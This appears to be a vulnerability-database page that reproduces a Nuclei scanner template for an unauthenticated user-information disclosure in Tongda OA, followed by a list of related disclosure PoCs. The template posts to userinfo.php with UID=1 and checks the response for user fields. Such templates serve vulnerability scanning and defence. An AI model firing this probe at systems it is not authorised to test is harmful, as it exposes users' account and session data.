tongda-session-disclosure: Tongda User Session Disclosure

漏洞描述

PoC代码[已公开]

id: tongda-session-disclosure

info:
  name: Tongda User Session Disclosure
  author: ritikchaddha
  severity: medium
  description: Tongda User session exposed.
  reference:
    - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ
  metadata:
    max-request: 1
  tags: tongda,disclosure,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/general/userinfo.php?UID=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"dept_name":"'
          - '"online_flag":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206f3b293b3e19f939abfb3f7caffe5fbb3b844378ea984dd415ba173c70e10c1c0220622f916a63d89b98162692fa4c83faf991139a4a25caa6f3976693a695f16c03:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC CVE-2019-4061: IBM BigFix Platform - Information Disclosure
• POC CVE-2024-31223: Fides Privacy Center ≤ 2.39.1 - Server-Side URL Disclosure
• POC CVE-2025-55749: XWiki - Information Disclosure
• POC bitrix-log-file-disclosure: Bitrix Site Manager - Log File Disclosure
• POC wp-easy-google-fonts-log-disclosure: WordPress Easy Google Fonts - Error Log Disclosure
• POC wp-importer-log-disclosure: WordPress Importer - Error Log Disclosure
• POC buildpath-file-disclosure: .buildpath - File Disclosure
• POC sharepoint-lists-api-disclosure: Microsoft SharePoint - List API Disclosure
• POC wp-woocommerce-admin-fpd: WordPress Plugin WooCommerce Admin (woocommerce-admin) Full Path Disclosure
• POC CVE-2024-6555: WP Popups - Information Disclosure
• POC CVE-2025-11833: Post SMTP <= 3.6.0 - Email Log Disclosure
• POC CVE-2025-51586: PrestaShop - Information Disclosure
• POC sharepoint-layouts-disclosure: Microsoft SharePoint - Layouts Disclosure